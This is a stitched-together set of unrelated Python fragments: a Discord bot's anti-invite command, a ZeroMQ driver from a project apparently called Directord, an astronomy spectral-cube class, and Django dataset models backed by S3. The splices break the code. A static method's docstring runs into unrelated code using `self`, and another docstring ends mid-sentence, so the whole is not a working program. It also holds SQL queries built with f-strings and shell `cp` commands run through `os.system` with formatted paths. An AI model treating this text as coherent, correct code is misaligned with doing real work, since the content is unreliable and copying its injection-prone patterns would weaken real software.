self.bot.connection.commit()
except Exception:
pass
embed = discord.Embed(description="Invite Cache was cleared!", color=guild_embedcolor_ctx(self, ctx))
await ctx.message.reply(embed=embed, mention_author=False)
@commands.has_permissions(manage_guild=True)
@commands.command()
async def antiinvite(self, ctx, state=None):
if state:
if state == "on" or state == "enable":
self.bot.cursor.execute(
f"SELECT gid FROM antiinvite WHERE gid = '{ctx.guild.id}'")
setting = self.bot.cursor.fetchone()
if setting is None:
sql = ("INSERT INTO antiinvite(gid, index) VALUES(%s,%s)")
val = (str(ctx.guild.id), "1")
self.bot.cursor.execute(sql, val)
self.bot.connection.commit()
embed = discord.Embed(description=f"Anti-Invite is now `Enabled`",
color=guild_embedcolor_ctx(self, ctx))
await ctx.message.reply(embed=embed, mention_author=False)
return
if setting is not None:
embed = discord.Embed(
description=f"Anti-Invite was already `Enabled`, to disable it type {prefix_data(ctx.guild.id)}disable",
color=guild_embedcolor_ctx(self, ctx))
await ctx.message.reply(embed=embed, mention_author=False)
return
if state == "off" or state == "disable":
self.bot.cursor.execute(
f"SELECT gid FROM antiinvite WHERE gid = '{ctx.guild.id}'")
setting = self.bot.cursor.fetchone()
if setting is not None:
self.bot.cursor.execute(f"DELETE FROM antiinvite WHERE gid = '{ctx.guild.id}'")
self.bot.connection.commit()
embed = discord.Embed(description=f"Anti-Invite is now `Disabled`",
| |
# Copyright Peznauts <<EMAIL>>. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import logging
import os
import time
import tenacity
try:
import zmq
import zmq.auth as zmq_auth
from zmq.auth.thread import ThreadAuthenticator
except (ImportError, ModuleNotFoundError):
pass
from directord import drivers
from directord import logger
from directord import utils
def parse_args(parser, parser_server, parser_client):
"""Add arguments for this driver to the parser.
:param parser: Parser
:type parser: Object
:param parser_server: SubParser object
:type parser_server: Object
:param parser_client: SubParser object
:type parser_client: Object
:returns: Object
"""
group = parser.add_argument_group("ZMQ driver options")
group.add_argument(
"--zmq-highwater-mark",
type=int,
default=os.getenv("DIRECTORD_ZMQ_HIGHWATER_MARK", 1024),
metavar="INTEGER",
help=("Set the ZMQ highwater mark. Default %(default)s."),
)
server_group = parser_server.add_argument_group(
"ZMQ Server driver options"
)
server_group.add_argument(
"--zmq-bind-address",
help=(
"ZMQ IP Address to bind a Directord Server."
" Default: %(default)s"
),
metavar="STRING",
default=os.getenv("DIRECTORD_ZMQ_BIND_ADDRESS", "*"),
)
client_group = parser_client.add_argument_group(
"ZMQ Client driver options"
)
client_group.add_argument(
"--zmq-server-address",
help=(
"ZMQ Domain or IP address of the Directord server."
" Default: %(default)s"
),
metavar="STRING",
default=os.getenv("DIRECTORD_ZMQ_SERVER_ADDRESS", "127.0.0.1"),
)
auth_group = group.add_mutually_exclusive_group()
auth_group.add_argument(
"--zmq-shared-key",
help="Shared key used for server client authentication.",
metavar="STRING",
default=os.getenv("DIRECTORD_ZMQ_SHARED_KEY", None),
)
auth_group.add_argument(
"--zmq-curve-encryption",
action="store_true",
help=(
"Server and client will connect using Curve authentication"
" and encryption. Enabling this option assumes keys have been"
" generated. see `manage --generate-keys` for more."
),
)
return parser
class Driver(drivers.BaseDriver):
def __init__(
self,
args,
encrypted_traffic_data=None,
interface=None,
):
"""Initialize the Driver.
:param args: Arguments parsed by argparse.
:type args: Object
:param encrypted_traffic_data: Enable|Disable encrypted traffic.
:type encrypted_traffic_data: Dictionary
:param interface: The interface instance (client/server)
:type interface: Object
"""
self.args = args
self.encrypted_traffic_data = encrypted_traffic_data
mode = getattr(self.args, "mode", None)
if mode == "client":
self.bind_address = self.args.zmq_server_address
elif mode == "server":
self.bind_address = self.args.zmq_bind_address
else:
self.bind_address = "*"
self.proto = "tcp"
self.connection_string = "{proto}://{addr}".format(
proto=self.proto, addr=self.bind_address
)
if self.encrypted_traffic_data:
self.encrypted_traffic = self.encrypted_traffic_data.get("enabled")
self.secret_keys_dir = self.encrypted_traffic_data.get(
"secret_keys_dir"
)
self.public_keys_dir = self.encrypted_traffic_data.get(
"public_keys_dir"
)
else:
self.encrypted_traffic = False
self.secret_keys_dir = None
self.public_keys_dir = None
self.ctx = zmq.Context.instance()  # classmethod; avoids creating a throwaway context first
self.poller = zmq.Poller()
self.interface = interface
super(Driver, self).__init__(
args=args,
encrypted_traffic_data=self.encrypted_traffic_data,
interface=interface,
)
self.bind_job = None
self.bind_backend = None
self.hwm = getattr(self.args, "zmq_highwater_mark", 1024)
def __copy__(self):
"""Return a new copy of the driver."""
return Driver(
args=self.args,
encrypted_traffic_data=self.encrypted_traffic_data,
interface=self.interface,
)
def _backend_bind(self):
"""Bind an address to a backend socket and return the socket.
:returns: Object
"""
bind = self._socket_bind(
socket_type=zmq.ROUTER,
connection=self.connection_string,
port=self.args.backend_port,
)
bind.set_hwm(self.hwm)
self.log.debug(
"Identity [ %s ] backend connect hwm state [ %s ]",
self.identity,
bind.get_hwm(),
)
return bind
def _backend_connect(self):
"""Connect to a backend socket and return the socket.
:returns: Object
"""
self.log.debug("Establishing backend connection.")
bind = self._socket_connect(
socket_type=zmq.DEALER,
connection=self.connection_string,
port=self.args.backend_port,
)
bind.set_hwm(self.hwm)
self.log.debug(
"Identity [ %s ] backend connect hwm state [ %s ]",
self.identity,
bind.get_hwm(),
)
return bind
def _bind_check(self, bind, interval=1, constant=1000):
"""Return True if a bind type contains work ready.
:param bind: A given Socket bind to identify.
:type bind: Object
:param interval: Exponential Interval used to determine the polling
duration for a given socket.
:type interval: Integer
:param constant: Constant time used to poll for new jobs.
:type constant: Integer
:returns: Object
"""
socks = dict(self.poller.poll(interval * constant))
if socks.get(bind) == zmq.POLLIN:
return True
else:
return False
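# Editor's sketch (assumed usage, not from the original file): a consumer can
# combine _bind_check with an exponential back-off so idle sockets are polled
# less aggressively:
#
#     interval = 1
#     while True:
#         if driver._bind_check(bind=driver.bind_job, interval=interval):
#             frames = driver.bind_job.recv_multipart()  # work is ready
#             interval = 1                               # reset the back-off
#         else:
#             interval = min(interval * 2, 32)           # idle: poll less often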
def _close(self, socket):
try:
socket.close(linger=2)
close_time = time.time()
while not socket.closed:
if time.time() - close_time > 60:
raise TimeoutError(
"Job [ {} ] failed to close transfer socket".format(
self.job_id
)
)
else:
socket.close(linger=2)
time.sleep(1)
except Exception as e:
self.log.error(
"Backend ran into an exception while closing the socket %s",
str(e),
)
else:
self.log.debug("Backend socket closed")
def _job_bind(self):
"""Bind an address to a job socket and return the socket.
:returns: Object
"""
return self._socket_bind(
socket_type=zmq.ROUTER,
connection=self.connection_string,
port=self.args.job_port,
)
def _job_connect(self):
"""Connect to a job socket and return the socket.
:returns: Object
"""
self.log.debug("Establishing Job connection.")
return self._socket_connect(
socket_type=zmq.DEALER,
connection=self.connection_string,
port=self.args.job_port,
)
def _socket_bind(self, socket_type, connection, port, poller_type=None):
"""Return a socket object which has been bound to a given address.
When the socket_type is not PUB, the bound socket will also be
registered with self.poller as defined within the Interface
class.
:param socket_type: Set the Socket type, typically defined using a ZMQ
constant.
:type socket_type: Integer
:param connection: Set the Address information used for the bound
socket.
:type connection: String
:param port: Define the port which the socket will be bound to.
:type port: Integer
:param poller_type: Set the Socket type, typically defined using a ZMQ
constant.
:type poller_type: Integer
:returns: Object
"""
if poller_type is None:
poller_type = zmq.POLLIN
bind = self._socket_context(socket_type=socket_type)
auth_enabled = (
self.args.zmq_shared_key or self.args.zmq_curve_encryption
)
if auth_enabled:
self.auth = ThreadAuthenticator(self.ctx, log=self.log)
self.auth.start()
self.auth.allow()
if self.args.zmq_shared_key:
# Enables basic auth
self.auth.configure_plain(
domain="*", passwords={"admin": self.args.zmq_shared_key}
)
bind.plain_server = True # Enable shared key authentication
self.log.info("Shared key authentication enabled.")
elif self.args.zmq_curve_encryption:
server_secret_file = os.path.join(
self.secret_keys_dir, "server.key_secret"
)
for item in [
self.public_keys_dir,
self.secret_keys_dir,
server_secret_file,
]:
if not os.path.exists(item):
raise SystemExit(
"The required path [ {} ] does not exist. Have"
" you generated your keys?".format(item)
)
self.auth.configure_curve(
domain="*", location=self.public_keys_dir
)
try:
server_public, server_secret = zmq_auth.load_certificate(
server_secret_file
)
except OSError as e:
self.log.error(
"Failed to load certificates: %s, Configuration: %s",
str(e),
vars(self.args),
)
raise SystemExit("Failed to load certificates")
else:
bind.curve_secretkey = server_secret
bind.curve_publickey = server_public
bind.curve_server = True # Enable curve authentication
bind.bind(
"{connection}:{port}".format(
connection=connection,
port=port,
)
)
if socket_type not in [zmq.PUB]:
self.poller.register(bind, poller_type)
return bind
def _socket_connect(self, socket_type, connection, port, poller_type=None):
"""Return a socket object which has been bound to a given address.
> A connection back to the server will wait 10 seconds for an ack
before going into a retry loop. This is done to forcefully cycle
the connection object to reset.
:param socket_type: Set the Socket type, typically defined using a ZMQ
constant.
:type socket_type: Integer
:param connection: Set the Address information used for the bound
socket.
:type connection: String
:param port: Define the port which the socket will be bound to.
:type port: Integer
:param poller_type: Set the Socket type, typically defined using a ZMQ
constant.
:type poller_type: Integer
:returns: Object
"""
if poller_type is None:
poller_type = zmq.POLLIN
bind = self._socket_context(socket_type=socket_type)
if self.args.zmq_shared_key:
bind.plain_username = b"admin" # User is hard coded.
bind.plain_password = self.args.zmq_shared_key.encode()
self.log.info("Shared key authentication enabled.")
elif self.args.zmq_curve_encryption:
client_secret_file = os.path.join(
self.secret_keys_dir, "client.key_secret"
)
server_public_file = os.path.join(
self.public_keys_dir, "server.key"
)
for item in [
self.public_keys_dir,
self.secret_keys_dir,
client_secret_file,
server_public_file,
]:
if not os.path.exists(item):
raise SystemExit(
"The required path [ {} ] does not exist. Have"
" you generated your keys?".format(item)
)
try:
client_public, client_secret = zmq_auth.load_certificate(
client_secret_file
)
server_public, _ = zmq_auth.load_certificate(
server_public_file
)
except OSError as e:
self.log.error(
"Error while loading certificates: %s. Configuration: %s",
str(e),
vars(self.args),
)
raise SystemExit("Failed to load keys.")
else:
bind.curve_secretkey = client_secret
bind.curve_publickey = client_public
bind.curve_serverkey = server_public
if socket_type == zmq.SUB:
bind.setsockopt_string(zmq.SUBSCRIBE, self.identity)
else:
bind.setsockopt_string(zmq.IDENTITY, self.identity)
self.poller.register(bind, poller_type)
bind.connect(
"{connection}:{port}".format(
connection=connection,
port=port,
)
)
self.log.info("Socket connected to [ %s ].", connection)
return bind
def _socket_context(self, socket_type):
"""Create socket context and return a bind object.
:param socket_type: Set the Socket type, typically defined using a ZMQ
constant.
:type socket_type: Integer
:returns: Object
"""
bind = self.ctx.socket(socket_type)
hwm = int(self.hwm * 4)
try:
bind.sndhwm = bind.rcvhwm = hwm
except AttributeError:
# older pyzmq releases lack the sndhwm/rcvhwm properties
bind.hwm = hwm
# belt-and-braces: apply the high-water mark through every available API
bind.set_hwm(hwm)
bind.setsockopt(zmq.SNDHWM, hwm)
bind.setsockopt(zmq.RCVHWM, hwm)
if socket_type == zmq.ROUTER:
bind.setsockopt(zmq.ROUTER_MANDATORY, 1)
return bind
@staticmethod
def _socket_recv(socket, nonblocking=False):
"""Receive a message over a ZM0 socket.
The message specification for server is as follows.
[
b"Identity"
b"ID",
b"ASCII Control Characters",
b"command",
b"data",
b"info",
b"stderr",
b"stdout",
]
The message specification for client is as follows.
[
b"ID",
b"ASCII Control Characters",
b"command",
b"data",
b"info",
b"stderr",
b"stdout",
]
All message parts are byte encoded.
"""
# store some metadata
self.meta['width'] = self.width
self.meta['target'] = self.obs.target.name
self.meta['night'] = self.obs.night.name
self.meta['instrument'] = self.obs.instrument.name
self.meta['extractiondefaults'] = self.obs.instrument.extractiondefaults
#if self.shift:
# raise ValueError("You need to store the shifts and stretches in the cube!")
self.speak("Done loading spectral cube.")
#self.markBad()
self.save()
# keep - save the entire cube to a single file
def save(self):
self.speak('attempting to save the cube of loaded, shifted, compiled spectra to {0}'.format(self.filename))
tosave = {}
for thing in self.savable:
tosave[thing] = self.__dict__[thing]
self.speak(' including [{0}] in the saved cube structure'.format(thing))
np.save(self.filename, tosave)
# keep - load the entire cube from a single file
def load(self):
self.speak('attempting to load previously saved cubes from...')
self.speak('{0}'.format(self.filename))
loaded = np.load(self.filename, allow_pickle=True)[()]
for thing in self.savable:
self.__dict__[thing] = loaded[thing]
self.speak(' loading [{0}] from the saved cube structure'.format(thing))
self.numberofstars = len(self.stellar['aperture'])
self.numberofwavelengths = len(self.spectral['wavelength'])
self.numberoftimes = len(self.temporal)
# keep - automated tool to package this observation into a nice directory
def packageandexport(self):
'''make a tidy package that contains necessary information for sending to someone else'''
# create a directory for this packaged cube to land
base = self.obs.reducer.extractionDirectory
toexport = os.path.join(base, 'cube_' + self.meta['target'] + '_' + self.meta['night'])
mkdir(toexport)
commandstorun = []
# copy the cube npy file
commandstorun.append('cp {} {}/.'.format(self.filename, toexport))
# copy the finder chart
commandstorun.append('cp {} {}/.'.format(os.path.join(base, 'genericfinderchart.pdf'), toexport))
# copy the finder chart
commandstorun.append('cp {} {}/.'.format(os.path.join(base,'extractionCenters.txt'), toexport))
# loop over the star directories
for s in self.stars:
stardir = os.path.join(toexport, s)
mkdir(stardir)
pdfs = glob.glob(os.path.join(base, s, '*aperture*.pdf'))
for p in pdfs:
# copy the finder chart
commandstorun.append('cp {} {}/.'.format(p, stardir))
apertureimage = os.path.join(base, s, 'animatedextraction/formovie_00000.png')
commandstorun.append('cp {} {}/{}_whichaperture.png'.format(apertureimage, stardir, s))
for c in commandstorun:
print(c)
os.system(c)
@property
def cubeMegaComparison(self):
'''
Return a fake cube entry for a combined mega-comparison star.
'''
if len(self.comparisons) == 1:
d = {}
star = self.comparisons[0]
for key in self.cubes.keys():
d[key] = self.cubes[key][star]
return d
else:
raise NameError("Darn it -- the mega-comparison hasn't been implemented yet!")
# keep - makes tidy image plots of spectral quantities
def imageCube(self, keys=None, stars=None, remake=False):
'''
Show an imshow of every cube key.
'''
if keys is None:
keys = self.cubekeys
if stars is None:
stars = self.stars
# we'll plot various types of images
options = {
'basic':'Raw Extracted Quantities',
'wavelength':'Wavelength-normalized Quantities',
'comparison':'Comparison-divided Quantities'
}
dir = os.path.join(self.directory, 'imagedcubes')
mkdir(dir)
for option, description in options.items():
filename = os.path.join(dir, '{}+{}+{}+{}.pdf'.format(option, {True:'shifted', False:'raw'}[self.shift], '-'.join(keys), '+'.join(stars)))
if os.path.exists(filename) and (remake == False):
self.speak('{} already exists'.format(filename))
#assert(False)
continue
nrows = len(keys)
ncols = len(stars)
fi, ax = plt.subplots(nrows, ncols,
sharex=True, sharey=True, figsize=(12,8),
gridspec_kw=dict(hspace=0.1, wspace=0.02))
plt.suptitle('{}, [width={}], [{}shifted]\n{}'.format(description, self.widthkey, {True:'', False:'un'}[self.shift], self.obs))
w = self.spectral['wavelength']
t = np.arange(self.numberoftimes)
# set up the imshow parameters
imkw = dict(
extent = [np.min(w), np.max(w), np.min(t), np.max(t)],
cmap = 'gray',
interpolation='nearest',
aspect = 'auto',
origin = 'lower'
)
# is this just a single panel?
single = len(keys)*len(stars) == 1
for i, key in enumerate(keys):
for j, star in enumerate(stars):
if single:
a = ax
else:
a = ax[i,j]
a.cla()
if option == 'basic':
# don't modify the measurements at all
self.speak('displaying the raw measurements for {}'.format(key))
z = self.cubes[key][star]
vmin, vmax = np.min(z), np.max(z)
if option == 'wavelength':
# normalize along the wavelength axis
self.speak('displaying the measurements normalized by their median spectrum for {}'.format(key))
z = self.cubes[key][star]
oned = np.median(z, 0)
z = z/oned[np.newaxis,:]
vmin, vmax = 0.8, 1.2
if option == 'comparison':
# divide by the comparison star[s]
self.speak('displaying the measurements divided by the comparison[s] for {}'.format(key))
target = self.cubes[key][star]
comparison = self.cubeMegaComparison[key]
z = target/comparison
oned = np.median(z, 0)
z = z/oned[np.newaxis,:]
vmin, vmax = 0.98, 1.02
#vmin, vmax = np.percentile(z, [1,99])
self.speak('the limits for {} on {} are [{} to {}]'.format(key, star, vmin, vmax))
#self.input('are these OK?')
a.imshow(z, vmin=vmin, vmax=vmax, **imkw)
# fuss with the axis labels
if j == 0:
a.set_ylabel('{}\n(timepoints)'.format(key))
else:
plt.setp(a.get_yticklabels(), visible=False)
if i == 0:
a.set_title('{}'.format(star))
if i == (len(self.cubekeys)-1):
a.set_xlabel('Wavelength (angstroms)')
else:
plt.setp(a.get_xticklabels(), visible=False)
plt.draw()
plt.savefig(filename, dpi=600)
self.speak('saved image of this cube to {}'.format(filename))
"""
I merged Hannah's algorithm into "determineStretches"
def nudgeWavelengths(self):
'''
This function loops through the extracted*.npy files
and determines corrected wavelength solutions that will match up
their lines. It writes a new array of wavelengths for each,
into a file that aligns with the original extracted file.
(Can be run before an unshifted cube is populated.)
The code for this was developed by <NAME>.
'''
def align_lines(stars, line_range, offset, line_pos, line_poses, plot=False):
'''
This function takes
stars: the extracted*.npy file
line_range: the pre-determined fixed alignment range for a given feature to use for the alignment
offset: how many angstroms to shift over when performing the cross-correlation of a given feature in a spectrum
line_pos: a list that this function will append values to; amount of shift in wavelength space for each star width
line_poses: a list of line_pos lists; amount of shifts in wavelength space for each star with all its widths
plot: do you want plots to pop up? (T/F)
This code assumes that the stellar spectra may shift slowly throughout the night but do not suddenly jump around from one exposure to the next.
'''
#### ZKBT: pulling out starmaster from the end of stars?
starmaster = stars[-1]
# find the wavelengths between the wavelength range of the feature for the master star
idxmaster = (starmaster['wavelength']>=line_range[0])*(starmaster['wavelength']<=line_range[1])
# get the corresponding values from raw_counts; this will be the main thing to correlate against
corrmaster = starmaster[width]['raw_counts'][idxmaster]
####### KLUDGE?????
# corrmaster = craftroom.oned.subtractContinuum(corrmaster, n=2) + 0.0
# this is where the "true" value of the line is; i.e., the reference position on the master spectrum
line = starmaster['wavelength'][idxmaster][0]
# where that line falls in pixel space; uses the wavelength solution from mosasaurus
linepx = np.interp(line, starmaster['wavelength'], starmaster['w'])
# list of stars is the stars from "aperture" in mosasaurus, plus the master star appended at the end
for s in range(len(stars)):
if (plot) and (s != (len(stars)-1)): self.speak('checking correlations for {}'.format(self.stars[s]))
# find the wavelengths between the wavelength range of the feature for this particular star
idxstar = (stars[s]['wavelength']>=line_range[0])*(stars[s]['wavelength']<=line_range[1])
# this is the spectrum of the star that you want to correlate to the master
corrstar = stars[s][width]['raw_counts']
####### KLUDGE?????
# corrstar = craftroom.oned.subtractContinuum(corrstar) + 0.0
# need to know now many wavelengths are being covered
arraylen = len(np.where(idxmaster)[0])
# this is the pixel where we will start the shift
initpx = np.where(idxstar)[0][0] - offset
#if corrstar[initpx] == 0.0:
# initpx = np.where(corrstar != 0.)[0][0]
# corrmaster = wavemaster[initpx+offset:initpx+offset+arraylen]
# empty lists for the correlation coeffients and the actual pixel shifts
corrs, shifts = [], []
# set the number of shifts you will try in the cross correlation; the finer the shift the more accurate everything will be but it will take longer
for shift in np.linspace(0, arraylen+offset, (arraylen+offset)*10+1):
# this is to make sure we're not losing counts at the ends of pixels when we're shifting by sub-pixels
newbit = shift%1
therest = 1 - newbit
startpx = int(np.floor(shift))
# create the array at the sub-pixel level that will be compared to the master star feature
corrarray = corrstar[initpx+startpx : initpx+startpx+arraylen]*therest + corrstar[initpx+startpx+1 : initpx+startpx+arraylen+1]*newbit
#if shift == 0:
# plt.plot(corrmaster)
# plt.plot(corrarray)
# plt.show()
corrs.append(np.corrcoef(corrmaster, corrarray)[0,1])
shifts.append(corrarray)
if plot == True and (s != len(stars)-1):
# can inspect where the code thinks the peak of the correlation is (careful! it doesn't always pick the right one!)
#print('1st corr')
color = self.starcolor(self.stars[s])
plt.plot(corrs, color=color)
plt.axvline(np.where(corrs == np.max(corrs))[0], color=color)
plt.title(str(line_range))
plt.xlim(0,400)
#plt.draw()
#plt.show()
#a = input('hmmm?')
# try a shift based on the correlation coefficients
# this first try may be wrong so we have to compare to past shifts
firstshiftind = np.where(corrs == np.max(corrs))[0][0]
firstrange = np.linspace(0, arraylen+offset, (arraylen+offset)*10+1)
firstshift = firstrange[firstshiftind]
# offset should be reasonably small since we assume the spectral features do not suddenly jump around from one exposure to the next
the admin.
"""
objects = DataCutDatasetManager()
class Meta:
proxy = True
verbose_name = "Data Cut Dataset"
permissions = [
(
"manage_unpublished_datacut_datasets",
"Manage (create, view, edit) unpublished datacut datasets",
)
]
class DataCutDatasetUserPermission(DataSetUserPermission):
"""
Proxy model to allow for separate admin pages for master and data cut datasets
"""
class Meta:
proxy = True
class ReferenceNumberedDatasetSource(TimeStampedModel):
"""
Abstract model that adds a reference number to a dataset source model.
"""
dataset = models.ForeignKey(DataSet, on_delete=models.CASCADE)
reference_number = models.IntegerField(null=True)
class Meta:
abstract = True
def save(self, force_insert=False, force_update=False, using=None, update_fields=None):
# If a reference code is set on the dataset, add a reference number to this source
# by incrementing the counter on the reference code model
if self.reference_number is None and self.dataset.reference_code is not None:
self.reference_number = self.dataset.reference_code.get_next_reference_number()
# If the dataset's reference code was unset, unset this source's reference number
elif self.reference_number is not None and self.dataset.reference_code is None:
self.reference_number = None
super().save(force_insert, force_update, using, update_fields)
@property
def source_reference(self):
if self.dataset.reference_code is not None and self.reference_number is not None:
return "".join(
[
self.dataset.reference_code.code.upper(),
str(self.reference_number).zfill(5),
]
)
return None
def get_filename(self, extension=".csv"):
filename = slugify(self.name) + extension # pylint: disable=no-member
if self.source_reference is not None:
return f"{self.source_reference}-{filename}"
return filename
class BaseSource(ReferenceNumberedDatasetSource):
FREQ_DAILY = 1
FREQ_WEEKLY = 2
FREQ_MONTHLY = 3
FREQ_QUARTERLY = 4
FREQ_ANNUALLY = 5
FREQ_6_MONTHLY = 6
FREQ_ADHOC = 7
_FREQ_CHOICES = (
(FREQ_DAILY, "Daily"),
(FREQ_WEEKLY, "Weekly"),
(FREQ_MONTHLY, "Monthly"),
(FREQ_QUARTERLY, "Quarterly"),
(FREQ_6_MONTHLY, "6-monthly"),
(FREQ_ANNUALLY, "Annually"),
(FREQ_ADHOC, "Ad hoc"),
)
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
name = models.CharField(
max_length=1024,
blank=False,
help_text="Used as the displayed text in the download link",
)
database = models.ForeignKey(Database, default=None, on_delete=models.CASCADE)
schema = models.CharField(
max_length=1024,
blank=False,
validators=[RegexValidator(regex=r"^[a-zA-Z][a-zA-Z0-9_\.]*$")],
default="public",
)
frequency = models.IntegerField(choices=_FREQ_CHOICES, default=FREQ_DAILY)
class Meta:
abstract = True
def __str__(self):
return self.name
class SourceTable(BaseSource):
table = models.CharField(
max_length=1024,
blank=False,
validators=[RegexValidator(regex=r"^[a-zA-Z][a-zA-Z0-9_\.]*$")],
)
dataset_finder_opted_in = models.BooleanField(
default=False,
null=False,
verbose_name="IAM/IAO opt-in for Dataset Finder",
help_text=(
"Should this dataset be discoverable through Dataset Finder for all users, "
"even if they haven’t been explicitly granted access?"
),
)
data_grid_enabled = models.BooleanField(
default=True,
help_text="Allow users to filter, sort and export data from within the browser",
)
data_grid_download_enabled = models.BooleanField(
default=False,
help_text="Allow users to download from the data grid (requires a download limit)",
)
data_grid_download_limit = models.IntegerField(
null=True,
blank=True,
help_text=(
"Set the maximum number of records that can be downloaded from the data grid "
"(required if data grid download is enabled)"
),
)
class Meta:
db_table = "app_sourcetable"
def __str__(self):
return f"{self.name} ({self.id})"
def can_show_link_for_user(self, user):
return False
@property
def type(self):
return DataLinkType.SOURCE_TABLE
def get_data_last_updated_date(self):
return get_earliest_tables_last_updated_date(
self.database.memorable_name, ((self.schema, self.table),)
)
def get_grid_data_url(self):
return reverse("datasets:source_table_data", args=(self.dataset_id, self.id))
def get_data_grid_query(self):
return sql.SQL("SELECT * from {}.{}").format(
sql.Identifier(self.schema), sql.Identifier(self.table)
)
def get_column_config(self):
"""
Return column configuration for the source table in the format expected by ag-grid.
"""
col_defs = []
for column in datasets_db.get_columns(
self.database.memorable_name,
schema=self.schema,
table=self.table,
include_types=True,
):
col_defs.append(
{
"field": column[0],
"filter": True,
"sortable": True,
"dataType": GRID_DATA_TYPE_MAP.get(column[1], column[1]),
}
)
return col_defs
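# Editor's note: get_column_config above returns entries shaped like the
# following (illustrative field names and dataType values only; the real ones
# come from the database and GRID_DATA_TYPE_MAP):
#
#     [
#         {"field": "id", "filter": True, "sortable": True, "dataType": "numeric"},
#         {"field": "name", "filter": True, "sortable": True, "dataType": "text"},
#     ]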
def get_column_details_url(self):
return reverse(
"datasets:source_table_column_details",
args=(self.dataset_id, self.id),
)
def get_chart_builder_url(self):
return reverse(
"charts:create-chart-from-source-table",
args=(self.id,),
)
def get_chart_builder_query(self):
return f"SELECT * from {self.schema}.{self.table}"
def get_previous_uploads(self):
return UploadedTable.objects.filter(schema=self.schema, table_name=self.table).order_by(
"-data_flow_execution_date"
)
class SourceTableFieldDefinition(models.Model):
field = models.CharField(
max_length=63,
blank=False,
validators=[RegexValidator(regex=r"^[a-zA-Z][a-zA-Z0-9_\.]*$")],
)
description = models.CharField(
max_length=1024,
blank=True,
null=True,
)
source_table = models.ForeignKey(
SourceTable, on_delete=models.CASCADE, related_name="field_definitions"
)
class SourceView(BaseSource):
view = models.CharField(
max_length=1024,
blank=False,
validators=[RegexValidator(regex=r"^[a-zA-Z][a-zA-Z0-9_\.]*$")],
)
def get_absolute_url(self):
return reverse("datasets:dataset_source_view_download", args=(self.dataset.id, self.id))
def can_show_link_for_user(self, user):
return True
@property
def type(self):
return DataLinkType.SOURCE_VIEW
class SourceLink(ReferenceNumberedDatasetSource):
TYPE_EXTERNAL = 1
TYPE_LOCAL = 2
_LINK_TYPES = ((TYPE_EXTERNAL, "External Link"), (TYPE_LOCAL, "Local Link"))
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
link_type = models.IntegerField(choices=_LINK_TYPES, default=TYPE_EXTERNAL)
name = models.CharField(
blank=False,
null=False,
max_length=128,
help_text="Used as the displayed text in the download link",
)
url = models.CharField(max_length=256)
format = models.CharField(blank=False, null=False, max_length=10)
frequency = models.CharField(blank=False, null=False, max_length=50)
class Meta:
db_table = "app_sourcelink"
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Stash the current link type so it can be compared on save
self._original_url = self.url
def __str__(self):
return self.name
def _is_s3_link(self):
return self.url.startswith("s3://")
def get_frequency_display(self):
return self.frequency
def local_file_is_accessible(self):
"""
Check whether we can access the file on s3
:return:
"""
client = get_s3_client()
try:
client.head_object(Bucket=settings.AWS_UPLOADS_BUCKET, Key=self.url)
except ClientError:
return False
return True
def _delete_s3_file(self):
if self.url.startswith("s3://sourcelink") and self.local_file_is_accessible():
client = get_s3_client()
client.delete_object(Bucket=settings.AWS_UPLOADS_BUCKET, Key=self.url)
def save(self, force_insert=False, force_update=False, using=None, update_fields=None):
# Allow users to change a url from local to external and vice versa
is_s3_link = self._is_s3_link()
was_s3_link = self._original_url.startswith("s3://")
if self.id is not None and self._original_url != self.url:
self.link_type = self.TYPE_LOCAL if is_s3_link else self.TYPE_EXTERNAL
super().save(force_insert, force_update, using, update_fields)
# If the link is no longer an s3 link delete the file
if was_s3_link and not is_s3_link:
self._delete_s3_file()
def delete(self, using=None, keep_parents=False):
if self.link_type == self.TYPE_LOCAL:
self._delete_s3_file()
super().delete(using, keep_parents)
def get_absolute_url(self):
return reverse("datasets:dataset_source_link_download", args=(self.dataset_id, self.id))
def get_preview_url(self):
return reverse("datasets:data_cut_source_link_preview", args=(self.dataset_id, self.id))
def show_column_filter(self):
# this will be enabled in subsequent PR
return False
def can_show_link_for_user(self, user):
return True
def get_filename(self): # pylint: disable=arguments-differ
if self.link_type == self.TYPE_LOCAL:
native_extension = os.path.splitext(self.url)[1]
extension = native_extension if native_extension else ".csv"
return super().get_filename(extension=extension)
return super().get_filename()
@property
def type(self):
return DataLinkType.SOURCE_LINK
def get_data_last_updated_date(self):
if self.link_type == self.TYPE_LOCAL:
try:
metadata = get_s3_client().head_object(
Bucket=settings.AWS_UPLOADS_BUCKET, Key=self.url
)
return metadata.get("LastModified")
except ClientError:
pass
return None
def user_can_preview(self, user):
return self.dataset.user_has_access(user)
def get_preview_data(self):
"""
Returns column names and preview data for an s3 hosted csv.
"""
if (
not self._is_s3_link()
or not self.local_file_is_accessible()
or not self.url.endswith(".csv")
):
return None, []
client = get_s3_client()
# Only read a maximum of 100Kb in for preview purposes. This should stop us getting
# denial-of-service'd by files with a massive amount of data in the first few columns
file = client.get_object(
Bucket=settings.AWS_UPLOADS_BUCKET, Key=self.url, Range="bytes=0-102400"
)
head = file["Body"].read().decode("utf-8")
# Drop anything after the rightmost newline in case we only got a partial row
head = head[: head.rindex("\n") + 1]
csv_data = head.splitlines()
del csv_data[settings.DATASET_PREVIEW_NUM_OF_ROWS :]
fh = StringIO("\n".join(csv_data))
reader = csv.DictReader(fh)
records = []
for row in reader:
records.append(row)
if len(records) >= settings.DATASET_PREVIEW_NUM_OF_ROWS:
break
return reader.fieldnames, records
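# Editor's sketch: the byte-range trick above in isolation. Reading a fixed
# prefix and trimming to the last newline guarantees only complete CSV rows
# are parsed (hypothetical standalone example, no S3 involved):
#
#     import csv
#     from io import StringIO
#
#     head = "a,b\n1,2\n3,4\n5,"   # pretend the range request cut row three
#     head = head[: head.rindex("\n") + 1]
#     rows = list(csv.DictReader(StringIO(head)))
#     assert rows == [{"a": "1", "b": "2"}, {"a": "3", "b": "4"}]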
class CustomDatasetQuery(ReferenceNumberedDatasetSource):
FREQ_DAILY = 1
FREQ_WEEKLY = 2
FREQ_MONTHLY = 3
